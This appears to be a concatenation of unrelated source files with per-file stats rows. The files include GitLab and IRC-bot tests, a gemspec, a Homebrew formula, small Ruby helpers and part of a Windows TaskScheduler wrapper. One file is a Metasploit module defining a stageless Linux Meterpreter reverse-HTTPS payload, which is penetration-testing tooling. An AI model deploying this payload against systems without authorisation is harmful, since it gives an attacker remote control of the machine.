expect(group.default_branch_name).to be_nil
end
end
context "when group.namespace_settings has a default branch name" do
let(:example_branch_name) { "example_branch_name" }
before do
allow(group.namespace_settings)
.to receive(:default_branch_name)
.and_return(example_branch_name)
end
it "returns the default branch name" do
expect(group.default_branch_name).to eq(example_branch_name)
end
end
end
describe '#membership_locked?' do
it 'returns false' do
expect(build(:group)).not_to be_membership_locked
end
end
describe '#default_owner' do
let(:group) { build(:group) }
context 'the group has owners' do
before do
group.add_owner(create(:user))
group.add_owner(create(:user))
end
it 'is the first owner' do
expect(group.default_owner)
.to eq(group.owners.first)
.and be_a(User)
end
end
context 'the group has a parent' do
let(:parent) { build(:group) }
before do
group.parent = parent
parent.add_owner(create(:user))
end
it 'is the first owner of the parent' do
expect(group.default_owner)
.to eq(parent.default_owner)
.and be_a(User)
end
end
context 'we fallback to group.owner' do
before do
group.owner = build(:user)
end
it 'is the group.owner' do
expect(group.default_owner)
.to eq(group.owner)
.and be_a(User)
end
end
end
describe '#parent_allows_two_factor_authentication?' do
it 'returns true for top-level group' do
expect(group.parent_allows_two_factor_authentication?).to eq(true)
end
context 'for subgroup' do
let(:subgroup) { create(:group, parent: group) }
it 'returns true if parent group allows two factor authentication for its descendants' do
expect(subgroup.parent_allows_two_factor_authentication?).to eq(true)
end
it 'returns false if parent group does not allow two factor authentication for its descendants' do
group.namespace_settings.update!(allow_mfa_for_subgroups: false)
expect(subgroup.parent_allows_two_factor_authentication?).to eq(false)
end
end
end
describe '#has_project_with_service_desk_enabled?' do
let_it_be(:group) { create(:group, :private) }
subject { group.has_project_with_service_desk_enabled? }
before do
allow(Gitlab::ServiceDesk).to receive(:supported?).and_return(true)
end
context 'when service desk is enabled' do
context 'for top level group' do
let_it_be(:project) { create(:project, group: group, service_desk_enabled: true) }
it { is_expected.to eq(true) }
context 'when service desk is not supported' do
before do
allow(Gitlab::ServiceDesk).to receive(:supported?).and_return(false)
end
it { is_expected.to eq(false) }
end
end
context 'for subgroup project' do
let_it_be(:subgroup) { create(:group, :private, parent: group) }
let_it_be(:project) { create(:project, group: subgroup, service_desk_enabled: true) }
it { is_expected.to eq(true) }
end
end
context "when none of the group's child projects has service desk enabled" do
let_it_be(:project) { create(:project, group: group, service_desk_enabled: false) }
before do
project.update!(service_desk_enabled: false)
end
it { is_expected.to eq(false) }
end
end
describe 'with Debian Distributions' do
subject { create(:group) }
it_behaves_like 'model with Debian distributions'
end
describe '.ids_with_disabled_email' do
let!(:parent_1) { create(:group, emails_disabled: true) }
let!(:child_1) { create(:group, parent: parent_1) }
let!(:parent_2) { create(:group, emails_disabled: false) }
let!(:child_2) { create(:group, parent: parent_2) }
let!(:other_group) { create(:group, emails_disabled: false) }
subject(:group_ids_where_email_is_disabled) { described_class.ids_with_disabled_email([child_1, child_2, other_group]) }
it { is_expected.to eq(Set.new([child_1.id])) }
end
describe '#timelogs' do
let(:project) { create(:project, namespace: group) }
let(:issue) { create(:issue, project: project) }
let(:other_project) { create(:project, namespace: create(:group)) }
let(:other_issue) { create(:issue, project: other_project) }
let!(:timelog1) { create(:timelog, issue: issue) }
let!(:timelog2) { create(:timelog, issue: other_issue) }
let!(:timelog3) { create(:timelog, issue: issue) }
it 'returns timelogs belonging to the group' do
expect(group.timelogs).to contain_exactly(timelog1, timelog3)
end
end
describe '#organizations' do
it 'returns organizations belonging to the group' do
organization1 = create(:organization, group: group)
create(:organization)
organization3 = create(:organization, group: group)
expect(group.organizations).to contain_exactly(organization1, organization3)
end
end
describe '#contacts' do
it 'returns contacts belonging to the group' do
contact1 = create(:contact, group: group)
create(:contact)
contact3 = create(:contact, group: group)
expect(group.contacts).to contain_exactly(contact1, contact3)
end
end
describe '#to_ability_name' do
it 'returns group' do
group = build(:group)
expect(group.to_ability_name).to eq('group')
end
end
describe '#activity_path' do
it 'returns the group activity_path' do
expected_path = "/groups/#{group.name}/-/activity"
expect(group.activity_path).to eq(expected_path)
end
end
context 'with export' do
let(:group) { create(:group, :with_export) }
it '#export_file_exists? returns true' do
expect(group.export_file_exists?).to be true
end
it '#export_archive_exists? returns true' do
expect(group.export_archive_exists?).to be true
end
end
describe '#open_issues_count', :aggregate_failures do
let(:group) { build(:group) }
it 'provides the issue count' do
expect(group.open_issues_count).to eq 0
end
it 'invokes the count service with current_user' do
user = build(:user)
count_service = instance_double(Groups::OpenIssuesCountService)
expect(Groups::OpenIssuesCountService).to receive(:new).with(group, user).and_return(count_service)
expect(count_service).to receive(:count)
group.open_issues_count(user)
end
it 'invokes the count service with no current_user' do
count_service = instance_double(Groups::OpenIssuesCountService)
expect(Groups::OpenIssuesCountService).to receive(:new).with(group, nil).and_return(count_service)
expect(count_service).to receive(:count)
group.open_issues_count
end
end
describe '#open_merge_requests_count', :aggregate_failures do
let(:group) { build(:group) }
it 'provides the merge request count' do
expect(group.open_merge_requests_count).to eq 0
end
it 'invokes the count service with current_user' do
user = build(:user)
count_service = instance_double(Groups::MergeRequestsCountService)
expect(Groups::MergeRequestsCountService).to receive(:new).with(group, user).and_return(count_service)
expect(count_service).to receive(:count)
group.open_merge_requests_count(user)
end
it 'invokes the count service with no current_user' do
count_service = instance_double(Groups::MergeRequestsCountService)
expect(Groups::MergeRequestsCountService).to receive(:new).with(group, nil).and_return(count_service)
expect(count_service).to receive(:count)
group.open_merge_requests_count
end
end
describe '#dependency_proxy_image_prefix' do
let_it_be(:group) { build_stubbed(:group, path: 'GroupWithUPPERcaseLetters') }
it 'converts uppercase letters to lowercase' do
expect(group.dependency_proxy_image_prefix).to end_with("/groupwithuppercaseletters#{DependencyProxy::URL_SUFFIX}")
end
it 'removes the protocol' do
expect(group.dependency_proxy_image_prefix).not_to include('http')
end
end
describe '#dependency_proxy_image_ttl_policy' do
subject(:ttl_policy) { group.dependency_proxy_image_ttl_policy }
it 'builds a new policy if one does not exist', :aggregate_failures do
expect(ttl_policy.ttl).to eq(90)
expect(ttl_policy.enabled).to eq(false)
expect(ttl_policy.created_at).to be_nil
expect(ttl_policy.updated_at).to be_nil
end
context 'with existing policy' do
before do
group.dependency_proxy_image_ttl_policy.update!(ttl: 30, enabled: true)
end
it 'returns the policy if it already exists', :aggregate_failures do
expect(ttl_policy.ttl).to eq(30)
expect(ttl_policy.enabled).to eq(true)
expect(ttl_policy.created_at).not_to be_nil
expect(ttl_policy.updated_at).not_to be_nil
end
end
end
end
| 34.458679 | 186 | 0.669288 |
ab7a06c69d4b0576117c86d299dc851d97fabe2f | 1,341 | $:.push File.expand_path('../lib', __FILE__)
require 'ripple/version'
Gem::Specification.new do |gem|
# Meta
gem.name = "ripple"
gem.version = Ripple::VERSION
gem.summary = %Q{ripple is an object-mapper library for Riak, the distributed database by Basho.}
gem.description = %Q{ripple is an object-mapper library for Riak, the distributed database by Basho. It uses ActiveModel to provide an experience that integrates well with Rails 3 applications.}
gem.email = ["[email protected]"]
gem.homepage = "http://seancribbs.github.com/ripple"
gem.authors = ["Sean Cribbs"]
# Deps
gem.add_development_dependency "rspec", "~>2.8.0"
gem.add_development_dependency 'rake'
gem.add_development_dependency 'ammeter', '~>0.2.2'
gem.add_dependency "riak-client", "~> 1.1.0"
gem.add_dependency "activesupport", [">= 3.0.0", "< 3.3.0"]
gem.add_dependency "activemodel", [">= 3.0.0", "< 3.3.0"]
gem.add_dependency "tzinfo"
# Files
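# expand the .gitignore globs (skipping comments and blank lines) so ignored
# files can be excluded from the gem contents below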
ignores = File.read(".gitignore").split(/\r?\n/).reject{ |f| f =~ /^(#.+|\s*)$/ }.map {|f| Dir[f] }.flatten
gem.files = (Dir['**/*','.gitignore'] - ignores).reject {|f| !File.file?(f) }
gem.test_files = (Dir['spec/**/*','.gitignore'] - ignores).reject {|f| !File.file?(f) }
# gem.executables = Dir['bin/*'].map { |f| File.basename(f) }
gem.require_paths = ['lib']
end
| 44.7 | 197 | 0.654735 |
eda34a0af15bac09c1f239c44e0ed3825bde2348 | 349 | require "rails_helper"
RSpec.describe "Site layout", type: :system do
describe "footer" do
it "is present" do
visit searches_show_path
expect(page).to have_selector('footer')
end
end
describe "header" do
it "is present" do
visit searches_show_path
expect(page).to have_selector('header')
end
end
end | 20.529412 | 46 | 0.673352 |
08d661c67d5e28619f004fac4c95f977503e0258 | 768 | module Fixy
module Formatter
module Alphanumeric
#
# Alphanumeric Formatter
#
# Only contains printable characters and is
# left-justified and filled with spaces.
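#
# Example (hypothetical values; assumes the CRLF/line-ending constants
# cover "\r" and "\n"):
#   format_alphanumeric('ABC', 5)      # => "ABC  "
#   format_alphanumeric("A\r\nB", 5)   # => "AB   " (line endings stripped)
#   format_alphanumeric('ABCDEFG', 5)  # => "ABCDE" (truncated on a character boundary)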
#
def format_alphanumeric(input, byte_width)
# strip CR/LF characters so embedded line endings cannot break the fixed-width record
input_string = String.new(input.to_s).tr("#{self.class::LINE_ENDING_CRLF}#{line_ending}", '')
result = ''
if input_string.bytesize <= byte_width
result += input_string
else
# accumulate characters until the byte budget is reached, so that a
# multibyte character is never split mid-character
input_string.each_char do |char|
if result.bytesize + char.bytesize <= byte_width
result += char
else
break
end
end
end
result + ' ' * (byte_width - result.bytesize)
end
end
end
end
| 23.272727 | 100 | 0.5625 |
d5eda3afafc3364e88786241399f2a38e122eaa9 | 1,325 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/reverse_https'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 692384
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',
'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>',
'Brent Cook <brent_cook[at]rapid7.com>',
'timwr'
],
'Platform' => 'linux',
'Arch' => ARCH_AARCH64,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseHttps,
'Session' => Msf::Sessions::Meterpreter_aarch64_Linux
)
)
end
def generate
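# returns the raw Mettle executable configured for a stageless HTTPS reverse connection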
opts = {
scheme: 'https',
stageless: true
}
MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec
end
end
| 28.191489 | 95 | 0.632453 |
edf2e0ea19b741f918438eb8d1eaf781be3e4ed7 | 268 | class Genotype < ApplicationRecord
belongs_to :strain
belongs_to :gene
belongs_to :modification
accepts_nested_attributes_for :gene # , :reject_if => proc { |a| a['title'].blank? }
accepts_nested_attributes_for :modification
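# the nested writers allow params like (hypothetical attribute names):
#   genotype.update(gene_attributes: { title: '...' })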
validates_presence_of :gene
end
| 24.363636 | 83 | 0.779851 |
e9cc786c566f3ba3ef8111b9087dc81fdcc9be61 | 1,093 | class Pstoedit < Formula
desc "Convert PostScript and PDF files to editable vector graphics"
homepage "http://www.pstoedit.net/"
url "https://downloads.sourceforge.net/project/pstoedit/pstoedit/3.71/pstoedit-3.71.tar.gz"
sha256 "0589cd22cd9c23dee12d9bc9f26760f872185d8a1fb72a05bc58f6b824cfbc95"
bottle do
sha256 "c153dec1a76f7d6a829276145552fc6dc3756322a3023a24506740ee128d9a23" => :high_sierra
sha256 "3f4a82c73fcc2c44bfaa043babe85b8a4190de731752a86a2db553fa18c5bc5d" => :sierra
sha256 "5b4de0d105ec879d80202d8c523e6052769316e29e7eb975f5e2b77b2fc369f4" => :el_capitan
end
depends_on "pkg-config" => :build
depends_on "plotutils"
depends_on "ghostscript"
depends_on "imagemagick"
depends_on "xz" if MacOS.version < :mavericks
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
test do
system bin/"pstoedit", "-f", "gs:pdfwrite", test_fixtures("test.ps"), "test.pdf"
assert_predicate testpath/"test.pdf", :exist?
end
end
| 36.433333 | 93 | 0.740165 |
abe48bf23b68a3591dcbb613abbe7d1e241deb6c | 1,207 | # frozen_string_literal: true
# ## Schema Information
#
# Table name: `killmail_fittings`
#
# ### Columns
#
# Name | Type | Attributes
# ------------------ | ------------------ | ---------------------------
# **`items`** | `jsonb` |
# **`similarity`** | `decimal(, )` | `not null`
# **`created_at`** | `datetime` | `not null`
# **`updated_at`** | `datetime` | `not null`
# **`fitting_id`** | `bigint` | `not null, primary key`
# **`killmail_id`** | `bigint` | `not null, primary key`
#
# ### Indexes
#
# * `index_killmail_fittings_on_fitting_id`:
# * **`fitting_id`**
# * `index_killmail_fittings_on_killmail_id`:
# * **`killmail_id`**
#
# ### Foreign Keys
#
# * `fk_rails_...`:
# * **`fitting_id => fittings.id`**
# * `fk_rails_...`:
# * **`killmail_id => killmails.id`**
#
class KillmailFitting < ApplicationRecord
self.primary_keys = :killmail_id, :fitting_id
belongs_to :fitting, inverse_of: :killmail_fittings
belongs_to :killmail, inverse_of: :killmail_fittings
scope :matching, -> { joins(:fitting).where('similarity >= COALESCE(fittings.killmail_match_threshold, 1.0)') }
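# e.g. KillmailFitting.matching: the killmail/fitting pairs whose stored
# similarity meets the owning fitting's killmail_match_threshold (treated as 1.0 when unset)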
end
| 30.175 | 113 | 0.551781 |
b90f92c976ccdc79002a83c3c1f8a838576f508b | 572 | require 'securerandom'
module Capistrano
module Postgresql
module PasswordHelpers
def generate_random_password
SecureRandom.hex(10)
end
# Invoked only when :pg_password is not already set in config/<stage>/deploy.rb; a directly set :pg_password takes precedence.
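# Example (hypothetical stage file, e.g. config/deploy/production.rb):
#   set :pg_ask_for_password, true   # prompt interactively at deploy time
#   # ...or set :pg_password directly to skip both the prompt and generation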
def ask_for_or_generate_password
if fetch(:pg_ask_for_password)
ask :pg_password, "Postgresql database password for the app: "
else
set :pg_password, generate_random_password
end
end
end
end
end
| 23.833333 | 147 | 0.687063 |
1a9497feb9f218e668ff7808d5629a7f3810bb4f | 2,553 | #-- encoding: UTF-8
#-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2020 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
module API
module V3
module WorkPackages
module Schema
class SpecificWorkPackageSchema < BaseWorkPackageSchema
attr_reader :work_package
include AssignableCustomFieldValues
include AssignableValuesContract
def initialize(work_package:)
@work_package = work_package
end
delegate :project_id,
:project,
:type,
:id,
:milestone?,
:available_custom_fields,
to: :@work_package
delegate :assignable_types,
:assignable_statuses,
:assignable_categories,
:assignable_priorities,
:assignable_versions,
to: :contract
def no_caching?
true
end
private
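# Builds and memoizes the create or update contract, depending on whether
# the work package is persisted.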
def contract
@contract ||= begin
klass = if work_package.new_record?
::WorkPackages::CreateContract
else
::WorkPackages::UpdateContract
end
klass
.new(work_package,
User.current)
end
end
end
end
end
end
end
| 31.134146 | 91 | 0.608696 |
7941d936f5dd8a2b29b383d6fc6ab09c760b2b1e | 2,084 | #!/usr/bin/ruby
###
### $Release: 2.6.6 $
### copyright(c) 2006-2010 kuwata-lab.com all rights reserved.
###
require 'rubygems' unless defined?(Gem)
spec = Gem::Specification.new do |s|
## package information
s.name = "erubis"
s.author = "makoto kuwata"
s.email = "kwa(at)kuwata-lab.com"
s.version = "2.7.0"
s.platform = Gem::Platform::RUBY
s.homepage = "http://www.kuwata-lab.com/erubis/"
s.summary = "a fast and extensible eRuby implementation which supports multi-language"
s.rubyforge_project = 'erubis'
s.description = <<-'END'
Erubis is an implementation of eRuby and has the following features:
* Very fast, almost three times faster than ERB and about 10% faster than eruby.
* Multi-language support (Ruby/PHP/C/Java/Scheme/Perl/Javascript)
* Auto escaping support
* Auto trimming spaces around '<% %>'
* Embedded pattern changeable (default '<% %>')
* Can handle Processing Instructions (PI) as an embedded pattern (e.g. '<?rb ... ?>')
* Context object support makes it easy to combine an eRuby template with a YAML data file
* Print statement available
* Easy to extend and customize in subclass
* Ruby on Rails support
END
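# A minimal usage sketch (assumes the erubis gem is installed):
#   require 'erubis'
#   eruby = Erubis::Eruby.new('Hello <%= name %>!')
#   name = 'World'
#   puts eruby.result(binding())   # => "Hello World!"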
## files
files = []
files += Dir.glob('lib/**/*')
files += Dir.glob('bin/*')
files += Dir.glob('examples/**/*')
files += Dir.glob('test/**/*')
files += Dir.glob('doc/**/*')
files += %w[README.txt CHANGES.txt MIT-LICENSE setup.rb]
files += Dir.glob('contrib/**/*')
files += Dir.glob('benchmark/**/*')
files += Dir.glob('doc-api/**/*')
s.files = files
s.executables = ['erubis']
s.bindir = 'bin'
s.test_file = 'test/test.rb'
s.add_dependency('abstract', ['>= 1.0.0'])
end
# Quick fix for Ruby 1.8.3 / YAML bug (thanks to Ross Bamford)
if (RUBY_VERSION == '1.8.3')
def spec.to_yaml
out = super
out = '--- ' + out unless out =~ /^---/
out
end
end
if $0 == __FILE__
#Gem::manage_gems
#Gem::Builder.new(spec).build
require 'rubygems/gem_runner'
# note: '$(project)' appears to be a build-time placeholder (substituted by the
# project's Makefile), not a literal gemspec filename
Gem::GemRunner.new.run ['build', '$(project).gemspec']
end
spec
| 30.202899 | 92 | 0.636276 |
91fa0f2afa0364f110104085418e3d75f5801909 | 3,748 | require_relative 'test_helper'
class IrcBotTest < Minitest::Test
def setup
@socket = mock('socket')
@irc_message = MockMessage.new
@irc_message.stubs(type: :PRIVMSG, method_symbol: "on_privmsg_messages")
@plugin = MockPlugin.new
@plugin_responses = ['RESPONSE1', 'RESPONSE2']
end
def test_instantiates_plugin
plugin = Minitest::Mock.new
MockPlugin.expects(:new).returns(plugin)
bot = IrcBot.new(@socket, plugins: ['MockPlugin'])
plugin.verify
assert_equal 1, bot.plugins.count
end
def test_raises_argument_error_if_plugin_isnt_valid
assert_raises ArgumentError do
IrcBot.new(@socket, plugins: ['MockInvalidPlugin'])
end
end
def test_sends_the_correct_messages_for_type
@plugin.expects(:on_all_messages).with(@irc_message)
@plugin.expects(:on_privmsg_messages).with(@irc_message)
bot = IrcBot.new(@socket)
bot.plugins << @plugin
bot.notify_plugins(@irc_message)
end
def test_collates_plugin_responses
@plugin.stubs(:on_all_messages).returns(@plugin_responses[0])
plugin_2 = MockPlugin.new
plugin_2.stubs(:on_privmsg_messages).returns(@plugin_responses[1])
bot = IrcBot.new(@socket)
bot.plugins = [@plugin, plugin_2]
assert_equal @plugin_responses, bot.notify_plugins(@irc_message)
end
def test_handles_plugin_exceptions
exception = Exception.new('Test Exception')
@plugin.stubs(:on_all_messages).returns(@plugin_responses[0])
@plugin.stubs(:on_privmsg_messages).raises(exception)
bot = IrcBot.new(@socket)
bot.plugins << @plugin
assert_equal [@plugin_responses[0], exception], bot.notify_plugins(@irc_message)
end
def test_handles_irc_message_from_plugin
message = IrcTools::PongMessage.new(:server => 'server')
bot = IrcBot.new(@socket)
bot.expects(:write_to_server).with(message)
bot.handle_responses [message]
end
def test_handles_string_message_from_plugin
message = 'PONG :server'
bot = IrcBot.new(@socket)
bot.expects(:write_to_server).with(message)
bot.handle_responses [message]
end
def test_handles_control_message_from_plugin
message = ControlMessage.new(:disconnect)
bot = IrcBot.new(@socket)
bot.expects(:execute_control_message).with(message)
bot.handle_responses [message]
end
def test_executes_the_correct_function_from_control_message
message = ControlMessage.new(:disconnect)
bot = IrcBot.new(@socket)
bot.expects(:disconnect)
bot.execute_control_message message
end
def test_execute_control_message_handles_absent_control_method
message = ControlMessage.new(:non_existant_ctrl_method)
bot = IrcBot.new(@socket)
bot.execute_control_message message
end
def test_bot_terminates_with_false_reload_flag_when_disconnected
@socket.expects(:write).with('QUIT')
@socket.expects(:connect)
@socket.expects(:disconnect)
irc_bot = IrcBot.new(@socket)
irc_bot.send(:disconnect)
assert_equal false, irc_bot.start
end
def test_bot_terminates_with_true_reload_flag_when_reloaded
@socket.expects(:write).with('QUIT')
@socket.expects(:connect)
@socket.expects(:disconnect)
irc_bot = IrcBot.new(@socket)
irc_bot.send(:reload)
assert_equal true, irc_bot.start
end
def test_bot_shuts_down_gracefully
irc_bot = IrcBot.new(@socket)
@socket.expects(:connect)
@socket.expects(:disconnect)
irc_bot.send(:disconnect)
irc_bot.expects(:write_to_server).with(IrcTools::QuitMessage.new)
irc_bot.start
end
end
class MockPlugin < IrcPlugin
def on_all_messages(message); nil; end
def on_privmsg_messages(message); nil; end
end
class MockInvalidPlugin
end
class MockMessage
attr_reader :type
end
| 25.324324 | 84 | 0.739861 |
ff26cff5b34466e2cfa1cabb9524e7e30223a53e | 46,260 | # frozen_string_literal: true
# DO NOT EDIT, ALTER, OR DELETE THIS FILE
# This file is copied from core puppet and frozen
# It is used in spec tests to ensure compatibility
# between this module and the old built-in type.
# Frozen from: https://github.com/puppetlabs/puppet/blob/5.5.3/lib/puppet/util/windows/taskscheduler.rb
require 'puppet/util/windows'
# disabling some false positives on the FFI definitions
# rubocop:disable Naming/ClassAndModuleCamelCase,Naming/ConstantName,Lint/Void
# The TaskScheduler class encapsulates taskscheduler settings and behavior
class Win32::TaskScheduler
include Puppet::Util::Windows::String
require 'ffi'
extend FFI::Library
# The error class raised if any task scheduler specific calls fail.
class Error < Puppet::Util::Windows::Error; end
class << self
attr_accessor :com_initialized
end
# :stopdoc:
TASK_TIME_TRIGGER_ONCE = :TASK_TIME_TRIGGER_ONCE
TASK_TIME_TRIGGER_DAILY = :TASK_TIME_TRIGGER_DAILY
TASK_TIME_TRIGGER_WEEKLY = :TASK_TIME_TRIGGER_WEEKLY
TASK_TIME_TRIGGER_MONTHLYDATE = :TASK_TIME_TRIGGER_MONTHLYDATE
TASK_TIME_TRIGGER_MONTHLYDOW = :TASK_TIME_TRIGGER_MONTHLYDOW
TASK_EVENT_TRIGGER_ON_IDLE = :TASK_EVENT_TRIGGER_ON_IDLE
TASK_EVENT_TRIGGER_AT_SYSTEMSTART = :TASK_EVENT_TRIGGER_AT_SYSTEMSTART
TASK_EVENT_TRIGGER_AT_LOGON = :TASK_EVENT_TRIGGER_AT_LOGON
TASK_SUNDAY = 0x1
TASK_MONDAY = 0x2
TASK_TUESDAY = 0x4
TASK_WEDNESDAY = 0x8
TASK_THURSDAY = 0x10
TASK_FRIDAY = 0x20
TASK_SATURDAY = 0x40
TASK_FIRST_WEEK = 1
TASK_SECOND_WEEK = 2
TASK_THIRD_WEEK = 3
TASK_FOURTH_WEEK = 4
TASK_LAST_WEEK = 5
TASK_JANUARY = 0x1
TASK_FEBRUARY = 0x2
TASK_MARCH = 0x4
TASK_APRIL = 0x8
TASK_MAY = 0x10
TASK_JUNE = 0x20
TASK_JULY = 0x40
TASK_AUGUST = 0x80
TASK_SEPTEMBER = 0x100
TASK_OCTOBER = 0x200
TASK_NOVEMBER = 0x400
TASK_DECEMBER = 0x800
TASK_FLAG_INTERACTIVE = 0x1
TASK_FLAG_DELETE_WHEN_DONE = 0x2
TASK_FLAG_DISABLED = 0x4
TASK_FLAG_START_ONLY_IF_IDLE = 0x10
TASK_FLAG_KILL_ON_IDLE_END = 0x20
TASK_FLAG_DONT_START_IF_ON_BATTERIES = 0x40
TASK_FLAG_KILL_IF_GOING_ON_BATTERIES = 0x80
TASK_FLAG_RUN_ONLY_IF_DOCKED = 0x100
TASK_FLAG_HIDDEN = 0x200
TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400
TASK_FLAG_RESTART_ON_IDLE_RESUME = 0x800
TASK_FLAG_SYSTEM_REQUIRED = 0x1000
TASK_FLAG_RUN_ONLY_IF_LOGGED_ON = 0x2000
TASK_TRIGGER_FLAG_HAS_END_DATE = 0x1
TASK_TRIGGER_FLAG_KILL_AT_DURATION_END = 0x2
TASK_TRIGGER_FLAG_DISABLED = 0x4
TASK_MAX_RUN_TIMES = 1440
TASKS_TO_RETRIEVE = 5
# COM
CLSID_CTask = FFI::WIN32::GUID['148BD520-A2AB-11CE-B11F-00AA00530503']
IID_ITask = FFI::WIN32::GUID['148BD524-A2AB-11CE-B11F-00AA00530503']
IID_IPersistFile = FFI::WIN32::GUID['0000010b-0000-0000-C000-000000000046']
SCHED_S_TASK_READY = 0x00041300
SCHED_S_TASK_RUNNING = 0x00041301
SCHED_S_TASK_HAS_NOT_RUN = 0x00041303
SCHED_S_TASK_NOT_SCHEDULED = 0x00041305
# HRESULT error codes
# https://blogs.msdn.com/b/eldar/archive/2007/04/03/a-lot-of-hresult-codes.aspx
# in Ruby, a 0x8XXXXXXX style HRESULT can be resolved to 2s complement
# by using "0x8XXXXXXX".to_i(16) - 0x100000000
# rubocop:disable Style/NumericLiterals
SCHED_E_ACCOUNT_INFORMATION_NOT_SET = -2147216625 # 0x8004130F
SCHED_E_NO_SECURITY_SERVICES = -2147216622 # 0x80041312
# No mapping between account names and security IDs was done.
ERROR_NONE_MAPPED = -2147023564 # 0x80070534 WIN32 Error CODE 1332 (0x534)
# rubocop:enable Style/NumericLiterals
# :startdoc:
# Shorthand constants
IDLE = Puppet::Util::Windows::Process::IDLE_PRIORITY_CLASS
NORMAL = Puppet::Util::Windows::Process::NORMAL_PRIORITY_CLASS
HIGH = Puppet::Util::Windows::Process::HIGH_PRIORITY_CLASS
REALTIME = Puppet::Util::Windows::Process::REALTIME_PRIORITY_CLASS
BELOW_NORMAL = Puppet::Util::Windows::Process::BELOW_NORMAL_PRIORITY_CLASS
ABOVE_NORMAL = Puppet::Util::Windows::Process::ABOVE_NORMAL_PRIORITY_CLASS
ONCE = TASK_TIME_TRIGGER_ONCE
DAILY = TASK_TIME_TRIGGER_DAILY
WEEKLY = TASK_TIME_TRIGGER_WEEKLY
MONTHLYDATE = TASK_TIME_TRIGGER_MONTHLYDATE
MONTHLYDOW = TASK_TIME_TRIGGER_MONTHLYDOW
ON_IDLE = TASK_EVENT_TRIGGER_ON_IDLE
AT_SYSTEMSTART = TASK_EVENT_TRIGGER_AT_SYSTEMSTART
AT_LOGON = TASK_EVENT_TRIGGER_AT_LOGON
FIRST_WEEK = TASK_FIRST_WEEK
SECOND_WEEK = TASK_SECOND_WEEK
THIRD_WEEK = TASK_THIRD_WEEK
FOURTH_WEEK = TASK_FOURTH_WEEK
LAST_WEEK = TASK_LAST_WEEK
SUNDAY = TASK_SUNDAY
MONDAY = TASK_MONDAY
TUESDAY = TASK_TUESDAY
WEDNESDAY = TASK_WEDNESDAY
THURSDAY = TASK_THURSDAY
FRIDAY = TASK_FRIDAY
SATURDAY = TASK_SATURDAY
JANUARY = TASK_JANUARY
FEBRUARY = TASK_FEBRUARY
MARCH = TASK_MARCH
APRIL = TASK_APRIL
MAY = TASK_MAY
JUNE = TASK_JUNE
JULY = TASK_JULY
AUGUST = TASK_AUGUST
SEPTEMBER = TASK_SEPTEMBER
OCTOBER = TASK_OCTOBER
NOVEMBER = TASK_NOVEMBER
DECEMBER = TASK_DECEMBER
INTERACTIVE = TASK_FLAG_INTERACTIVE
DELETE_WHEN_DONE = TASK_FLAG_DELETE_WHEN_DONE
DISABLED = TASK_FLAG_DISABLED
START_ONLY_IF_IDLE = TASK_FLAG_START_ONLY_IF_IDLE
KILL_ON_IDLE_END = TASK_FLAG_KILL_ON_IDLE_END
DONT_START_IF_ON_BATTERIES = TASK_FLAG_DONT_START_IF_ON_BATTERIES
KILL_IF_GOING_ON_BATTERIES = TASK_FLAG_KILL_IF_GOING_ON_BATTERIES
RUN_ONLY_IF_DOCKED = TASK_FLAG_RUN_ONLY_IF_DOCKED
HIDDEN = TASK_FLAG_HIDDEN
RUN_IF_CONNECTED_TO_INTERNET = TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET
RESTART_ON_IDLE_RESUME = TASK_FLAG_RESTART_ON_IDLE_RESUME
SYSTEM_REQUIRED = TASK_FLAG_SYSTEM_REQUIRED
RUN_ONLY_IF_LOGGED_ON = TASK_FLAG_RUN_ONLY_IF_LOGGED_ON
FLAG_HAS_END_DATE = TASK_TRIGGER_FLAG_HAS_END_DATE
FLAG_KILL_AT_DURATION_END = TASK_TRIGGER_FLAG_KILL_AT_DURATION_END
FLAG_DISABLED = TASK_TRIGGER_FLAG_DISABLED
MAX_RUN_TIMES = TASK_MAX_RUN_TIMES
# unfortunately MSTask.h does not specify the limits for any settings
# so these were determined with some experimentation
# if values too large are written, it's suspected that internal
# limits may be exceeded, corrupting the job
# used for max application name and path values
MAX_PATH = 260
# UNLEN from lmcons.h is 256
# https://technet.microsoft.com/it-it/library/bb726984(en-us).aspx specifies 104
MAX_ACCOUNT_LENGTH = 256
# command line max length is limited to 8191, choose something high but still enough that we don't blow out CLI
MAX_PARAMETERS_LENGTH = 4096
# in testing, this value could be set to a length of 99999, but saving / loading the task failed
MAX_COMMENT_LENGTH = 8192
# Returns a new TaskScheduler object. If a work_item (and possibly the
# trigger) are passed as arguments then a new work item is created and
# associated with that trigger, although you can still activate other tasks
# with the same handle.
#
# This is really just a bit of convenience. Passing arguments to the
# constructor is the same as calling TaskScheduler.new plus
# TaskScheduler#new_work_item.
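#
# Example (hypothetical task name and trigger; Windows only):
#   trigger = { 'start_year' => 2018, 'start_month' => 1, 'start_day' => 1,
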